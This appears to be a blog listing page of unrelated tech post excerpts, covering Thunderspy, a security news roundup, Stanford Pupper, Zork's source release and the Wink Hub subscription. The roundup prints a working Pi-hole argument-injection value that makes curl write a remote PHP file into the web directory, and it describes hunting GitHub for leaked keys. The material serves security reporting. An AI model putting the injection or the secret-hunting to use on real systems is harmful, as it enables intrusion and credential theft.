Based on a few details from the request for project proposals, it looks like the DoD is targeting mostly companies in this particular solicitation, but have left the door open for academic institutions as well. That makes intuitive sense. Companies can generally operate at a faster pace than most academic research labs. Given the urgency of the matter, faster turnarounds in technological development are imperative. Nonetheless, we have seen quite a bit of important COVID-19 work coming from academic research labs and we imagine that battling this pandemic will take all the brilliant minds we can muster together.
It’s good to see the DoD join the fight in what could be a lengthy battle with the coronavirus.
Augmented reality (AR) in the classroom has garnered a bit of interest over the years, but given the increased need for remote and virtual learning these days, it might be worth taking a closer look at what AR can offer. Purdue University’s C Design Lab thinks they’ve found a solution in their Meta-AR platform. The program allows an instructor to monitor each student’s work in real-time without being in the same classroom as the student. Not only that, but the platform allows students to collaborate in real-time with each other giving each other tips and feedback while also being able to interact with each other’s work, no matter where they may be physically located.
Thunderspy was announced this week, developed by [Björn Ruytenberg]. A series of attacks on the Thunderbolt 3 protocol, Thunderspy is the next vulnerability in the style of Inception, PCILeech, and Thunderclap.
Inception and PCILeech were attacks on the naive Direct Memory Access (DMA) built into Firewire, Thunderbolt 1, and PCIe. A device could connect and request DMA over the link. Once granted, it could access the bottom four gigabytes of system memory, with both read and write access. It’s not hard to imagine how that would be a huge security problem, and it seems that this technique was in use by intelligence agencies at the time it was discovered. As an aside, the hardware DMA was entirely independent of software, so it was possible to debug a crashed kernel over firewire.
Once the vulnerability was made public, hardware and software vendors have taken steps to harden their systems against the attack. Thunderbolt 2 introduced security levels as a mitigation against the attacks. A user has to mark a device as trusted before DMA is offered to that device. Thunderclap exploited a series of vulnerabilities in how individual OSes interacted with those hardware mitigations.
Image by Björn Ruytenberg. Licensed under CC BY 4.0.
Now, Thunderspy abuses a series of problems in Intel’s Thunderbolt 3 specification and implementation. One interesting attack is cloning an already trusted Thunderbolt device. Plugging a Thunderbolt device into a Linux machine easily captures the device UUID. A malicious Thunderbolt device can be given that same UUID, and suddenly has the same level of trust as the cloned device.
[Björn] took the attack a step further, and discovered that he could disassemble a laptop or thunderbolt device, and read the firmware directly off the thunderbolt controller. That firmware can be modified and re-uploaded. One of the simplest attacks that enables is turning the security level to its lowest setting.
It’s interesting research, and there are fixes coming or already in place to mitigate the problems found. The real question is how much Thunderspy matters. The threat model is the evil maid: A laptop left in a motel room would be available to the cleaning staff for a few minutes. Thunderspy could potentially be used for this style of attack, but there are many other potentially better attack options. There is a narrow circumstance where Thunderspy is the perfect technique: A device with an encrypted drive, that’s been powered on and logged into, but locked. In this case, Thunderspy could be used to recover the drive encryption key stored in memory, and then used to plant malware.
That Time When Facebook Broke Everything
You may have noticed some widespread iOS application misbehavior on the 6th. Facebook introduced a change to the server component to their sign-on SDK, which caused many apps that made use of that SDK to crash. It’s worth asking if it’s a good idea for so many popular apps to use Facebook code. There doesn’t appear to have been a vulnerability or path to compromise other than the denial of service.
Large-scale WordPress attack
Nearly a million WordPress sites are under attack, in a campaign targeting a variety of vulnerabilities. The general attack strategy is to inject a malicious javscript that lays dormant until it’s executed by a site administrator. Ironically, logging in to your site to check it for compromise could be the trigger that leads to compromise. As always, keep your plugins up to date and follow the rest of the best practices.
Godaddy Breaches
Godaddy users were recently informed that there was a breach that exposed portions of their accounts to compromise. Notably, the compromise happened back in October of 2019, and wasn’t discovered for 6 months. Godaddy has stated that there wasn’t any evidence of any malicious action beyond the initial compromise, which is puzzling in itself.
On April 23, 2020, we identified SSH usernames and passwords had been compromised through an altered SSH file in our hosting environment. This affected approximately 28,000 customers. We immediately reset these usernames and passwords, removed the offending SSH file from our platform, and have no indication the threat actor used our customers’ credentials or modified any customer hosting accounts. To be clear, the threat actor did not have access to customers’ main GoDaddy accounts.
Pi-hole Exploit
A fun RCE exploit was discovered in the Pi-hole software. This particular problem requires authenticated access to the Pi-hole administrative web interface, so it’s not likely to cause too many problems on its own. Exploiting the flaw is simple, just set http://192.168.122.1#" -o fun.php -d " as the remote blocklist, with an IP that you control. Under the hood, the remote blocklist is fetched via curl, and the URL isn’t properly sanitized. Your PHP code is saved in the web directory, and an HTTP request triggers that code.
Leaking on Github
[Tillson Galloway] tells the story of how he made $10,000 in bug bounties, simply by searching Github for passwords and keys that shouldn’t be there. By searching for specific keywords, he found all sorts of interesting, unintentional things. vim_settings.xml contains recently copied and pasted strings, and .bash_history contains a record of commands that have been run. How many times have you accidentally typed a password in on the command line, thinking you were authenticating with SSH or sudo, just for an example? It’s an easy mistake to make, to accidentally include one of these hidden files in a public repository.
There have been examples of API keys accidentally included in source code drops, and even SSL certificates leaked this way over the years. It’s a lesson to all of us, make sure to sanitize projects before pushing code to Github.
Personally, I am a fan of the real thing, but dogs aren’t an option for all. Plus, robotic dogs are easier to train and don’t pee on your couch. If you are looking to adopt a robotic companion, Stanford Pupper might be a good place to start. It’s a new open source project from the Stanford Robotics Student group, a group of robotic hackers from Stanford University. This simple robotic quadruped looks pretty simple to build, but also looks like a great into to four-legged robots.
This is the first version of the design, but it looks pretty complete, built around a carbon fiber and 3D printed frame. The carbon fiber parts have to be cut out on a router, but you can order them pre-cut here, and you might be able to adapt it to easier materials. The Pupper is driven by twelve servos powered from a 5200 mAh 2S LiPo battery and a custom PCB that distributes the power. That means it could run autonomously.
Though mostly known for its releases on countless 8-bit personal computers from the 1970s and 1980s, the game of Zork began its life on a PDP-10 mainframe. Recently, MIT released the original source code for this version of Zork. As we covered a while ago, the history of Zork is a long and lustrous one, a history that is based on this initial version written in MDL.
To recap, MDL is a LISP-derived language that excels at natural language processing. It was developed and used at MIT’s AI and LCS (now CSAIL) departments for a number of projects, and of course to develop games with. The use of MDL gave Zork as a text-based adventure a level of interaction that was far ahead of its time.
What MIT has made available is the source code from Zork as it existed around 1977, at a time when it was being distributed to universities around the US. For purely educational purposes, obviously. This means that it’s a version of Zork before it was commercialized (~1979), showing a rare glimpse of the game as it was still busily being expanded.
Running the game will take a bit of effort, however. These files were retrieved from an original MIT backup tape that was used with their PDP-10 machines. Ideally one would use a 1970s-era PDP-10 mainframe with an MDL compiler, but in a pinch one could run a PDP-10 emulator as well.
Let us know whether you got it to run. Screenshots (ASCII or not) are highly encouraged.
Apple recently patched a security problem, and fixed the Psychic Paper 0-day. This was a frankly slightly embarrasing flaw that [Siguza] discovered in how iOS processed XML data in an application’s code signature that allowed him access to any entitlement on the iOS system, including running outside a sandbox.
Entitlements on iOS are a set of permissions that an application can request. These entitlements range from the aforementioned com.apple.private.security.no-container to platform-application, which tells the system that this is an official Apple application. As one would expect, Apple controls entitlements with a firm grip, and only allows certain entitlements on apps hosted on their official store. Even developer-signed apps are extremely limited, with only two entitlements allowed.
This system works via an XML list document that is part of the signed application. XML is a relative of HTML, but with a stricter set of rules. What [Siguza] discovered is that iOS contains 4 different XML parsers, and they deal with malformed XML slightly differently. The kicker is that one of those parsers does the security check, while a different parser is used for that actual permission implementation. Is it possible that this mismatch could contain a vulnerability? Of course there is. Continue reading “This Week In Security: Psychic Paper, Spilled Salt, And Malicious Captchas”→
Wink Labs just announced that their home automation hub, the Wink Hub, is “transitioning to a $4.99 monthly subscription, starting on May 13, 2020.” Should you fail to pay the fiver every month, you will lose access to their app, voice control, and automations, which is everything it does as far as we can tell.
This is an especially bitter pill to swallow for Hub users, because the device was just that — a hub. It speaks Bluetooth, Z-Wave, ZigBee, WiFi, Kidde, and a couple other specific device protocols, interfaces with Amazon’s Alexa, has a handy Android master panel app, and had a nice “robot” system that made the automation side of “home automation” simple for normal people. In short, with its low one-time purchase price, compatibility with many devices, nice phone app, and multiple radios, it was a great centerpiece for a home-automation setup.
“Nice home automation system you’ve got there. Would be a shame if anything happened to it.”